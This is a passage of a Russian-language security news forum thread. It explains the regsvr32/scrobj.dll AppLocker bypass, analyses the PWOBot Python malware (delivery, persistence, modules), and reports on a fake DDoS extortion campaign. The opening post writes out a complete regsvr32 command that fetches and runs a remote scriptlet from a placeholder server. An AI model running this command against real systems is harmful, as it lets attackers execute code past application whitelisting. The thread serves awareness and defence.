    regsvr32 /s /n /u /i:http://server/file.sct scrobj.dll
    Исполнение этой команды приводит к скачиваю XML-файла, который запустит cmd.exe, но его можно заменить на любую другую программу, и не важно, какие ограничения установлены в AppLocker: программа всё равно успешно запустится.

    Как это работает?
    Regsvr32 является частью ОС и может использоваться для регистрации или отмены регистрации файлов COM скриптов в реестре Windows. В команде Смита: /s в коде обязывает Regsvr32 работать тихо, /n приказывает не использовать DllRegisterServer, /u означает отмену регистрации, а параметр /i отвечает за ссылку и DLLinstall. В свою очередь, scrobj.dll – это Script Component Runtime.

    Обнаружено, что Regsvr32 обработает URL и доставит на машину заданный файл через HTTP или HTTPS. Смит добавил немного JavaScript к своему XML-файлу и инициировал его исполнение через запрос на отмену регистрации .DLL. Таким образом, обход AppLocker становится простым трюком, ведь любой пользователь может отправить запрос на отмену регистрации.

    Атака Смита не требует привилегий администратора, может быть выдана за обычную сессию HTTP, и не должна оставить ни единого следа на жестком диске жертвы, т.к. не затрагивает реестр и работает непосредственно с памятью. Никаких патчей на данный момент не существует, разве что Regsvr32 можно отрезать от интернета при помощи файервола.

     
    Охотник и lilia-5-0 нравится это.
  18. SNS-amigo
    Оффлайн

    SNS-amigo SNS System Watch Freelance reporter

    Сообщения:
    5.219
    Симпатии:
    8.911
    Баллы:
    643
    Таргетированные атаки кроссплатформенного вредоноса PWOBot
    (часть первая)

    Обнаружено и описано семейство вредоносных программ под названием PWOBot, уникальное тем, что этот вредонос полностью написан на Python и скомпилирован с помощью PyInstaller, с целью создания исполняемого файла Windows. Вредонос атаковал целый ряд организаций, базирующихся в Европе, главным образом в Польше, да ещё поставлялся с помощью популярной польской веб-службы обмена файлами Chomikuj (типа: хомяки).

    PWOBot оснащен рядом функциональных возможностей, в том числе умеет загружать и запускать файлы, выполнять код Python, вести журнал нажатий клавиш, подключать HTTP-сервер, добывать криптовалюту, используя производительность процессоров и видеоадаптеров ПК жертв.

    Известно по крайней мере 12 вариантов PWOBot, чья вредоносная деятельность наблюдается с конца 2013 г. Недавние нападения на организации происходили с середины до конца 2015 года. Этим атакам были подвержены следующие польские и иностранные организации:
    - польский национальный научно-исследовательский институт;
    - польская транспортная компания;
    - крупнейший польский ритейлер;
    - польская организация по информационным технологиям;
    - датская строительная компания;
    - французский поставщик оптического оборудования.

    Большинство образцов PWOBot были загружены из chomikuj.pl, популярной польской веб-службы обмена файлами. Единичный случай загрузки вредоноса указал на китайский URL (huijang*com).

    Для доставки вредоноса PWOBot наблюдались следующие имена файлов:
    favicon.png
    Quick PDF to Word 3.0.exe
    XoristDecryptor 2.3.19.0 full ver.exe
    Easy Barcode Creator 2.2.6.exe
    Kingston Format Utility 1.0.3.0.exe
    uCertify 1Z0-146 Oracle Database 8.05.05 Premium.exe
    Six Sigma Toolbox 1.0.122.exe
    Польские лекции по физиологии и спорту (exe-файлы).

    Можно сделать вывод на основе этих файлов, что вредоносные программы поставлялись конечным пользователям, которые считали, что загружают совершенно другое программное обеспечение. Фишинг-атаки использовались для того, чтобы побудить жертв загрузить эти файлы.

    Продолжение следует...
     
    Охотник и lilia-5-0 нравится это.
  19. SNS-amigo
    Оффлайн

    SNS-amigo SNS System Watch Freelance reporter

    Сообщения:
    5.219
    Симпатии:
    8.911
    Баллы:
    643
    Таргетированные атаки кроссплатформенного вредоноса PWOBot
    (часть вторая)

    Что не говори, а кроссплатформенность PWOBot застала всех врасплох. Благодаря языку Python он может быть легко перенесен на другие операционные системы, такие как Linux или OS X.

    PWOBot сначала удаляет из системы все предыдущие версии вредоносов, а затем устанавливает новые версии вредоносного ПО.

    [​IMG]
    Рис.1. PWOBot удаляет предыдущие версии.

    После удаления предыдущих версий будет установлен новый PWOBot, который создаст свою копию в следующем месте: %HOMEPATH%/pwo[VERSION]

    Затем он создаст следующий раздел реестра, указывающий на копию исполняемого файла:
    HKCU/SOFTWARE/Microsoft/Windows/CurrentVersion/Run/pwo[VERSION]

    Если это первый запуск вредоноса, то PWOBot выполнит вновь скопированный файл в новом процессе. После завершения установки PWOBot зацепит различные события клавиатуры и мыши, которые будут использоваться для последующего кейлоггинга (регистрации нажатий клавиш).

    PWOBot написан по модульному принципу, что позволяет злоумышленникам во время выполнения включать в него различные модули. На основании проанализированных образцов исследователями были определены следующие службы и сделаны описания их запуска вместе с PWOBot:

    PWOLauncher: Загрузка/запуск файла или запуск локального файла
    PWOHTTPD: запуск HTTP-сервера на зараженном ПК;
    PWOKeyLogger: кейлоггинг на зараженном ПК;
    PWOMiner: добывание криптовалюты с помощью CPU / GPU зараженного ПК;
    PWOPyExec: выполнение Python-кода;
    PWOQuery: запрос удаленного URL и получение ответа.

    PWOBot также оснащен двумя файлами конфигурации, один из которых определяет какие параметры вредоноса следует использовать, а другой указывает на то, какие удаленные серверы должны подключаться во время выполнения PWOBot.

    PWOBot-2. PWOBot-3.
    Рис.2. Конфигурация настроек PWOBot (слева)
    Рис.3. Конфигурация удаленного сервера PWOBot (справа)


    Как видно из файла конфигурации настроек (рис.2), PWOBot включает в себя разные исполняемые файлы, которые активны, когда нападавшие компилируют код с помощью PyInstaller.
    Эти исполняемые файлы используются для добывания криптовалюты Bitcoin и прокси-запросов через Tor (один для использования ресурсов CPU, другой для майнинга Bitcoin). Более поздние версии PWOBot перешли от майнинга Bitcoin к майнингу Ethereum.

    Также PWOBot использует Tor для туннелирования всего трафика на удаленный сервер атакующего, потому этот факт не должен пройти незамеченным для сетевых администраторов организации.

    PWOBot использует словарь Python, как сетевой протокол. Каждый определенный период времени PWOBot посылает сообщение с уведомлением на удаленный сервер. Примеры см. в оригинальной статье. После отправки уведомления, злоумышленники также могут отказаться от отправки PWOBot набора команд для выполнения определенного набора инструкций.

     
    Охотник и lilia-5-0 нравится это.
  20. SNS-amigo
    Оффлайн

    SNS-amigo SNS System Watch Freelance reporter

    Сообщения:
    5.219
    Симпатии:
    8.911
    Баллы:
    643
    Вымогательство, построенное на страхе перед DDoS-атаками

    Недавно, прикрывшись звонким названием "Armada Collective", неизвестные "заработали" свыше $100 тыс без видимых усилий. Ранее, в ноябре прошлого года реально существовавшая группировка Armada Collective осуществила серию масштабных DDoS-атак на целый ряд почтовых сервисов, отказавшихся заплатить ей выкуп. Armada Collective также осуществляла свою деятельность под названием DD4BC (аббревиатура расшифровывается как "DDoS for Bitcoin – DDoS за биткойны").

    Несколько человек, предположительно имеющих к ней отношение, были арестованы в январе 2016 года, однако после стали появляться сообщения о возвращении Armada Collective.

    По данным CloudFlare, свыше ста компаний получили от группировки, называющей себя "Armada Collective", письма с требованием выплатить выкуп в размере 10-50 биткойнов. За задержку выплаты сумма выкупа возрастет, а за отказ платить компания подвергнется DDoS-атаке мощностью в 1 Тб/с, говорится в письмах. Все получившие угрозы предпочли принять условия злоумышленников и выплатили выкуп. Таким образом неизвестные, прикрывающиеся именем "Armada Collective", на ровном месте заработали кругленькую сумму.

    ddos-fake.

    Похоже, на самом деле все угрозы были пустыми, и сегодняшние мошенники даже не собирались никого атаковать. Специалисты CloudFlare не смогли найти ни одного случая, когда бы новоиспечённые "Armada Collective" выполнили или хотя бы попытались организовать одну атаку DDoS.

    Исследователей из CloudFlare насторожил тот факт, что для получения выкупа вымогатели использовали один и тот же биткойн-кошелек, и знать, кто из жертв заплатил, а кто нет, они не могли. Все попытки экспертов обнаружить след хотя бы одной атаки, осуществленной нынешним воплощением Armada Collective, оказались безрезультатными.

    Пока настоящие участники Armada Collective отбывают срок в тюрьме, с помощью всего лишь биткойн-кошелька и электронного ящика неизвестные, прикрываясь ее именем, нагоняют страх и зарабатывают сотни тысяч долларов на вымогательстве.
     
    Охотник нравится это.

Поделиться этой страницей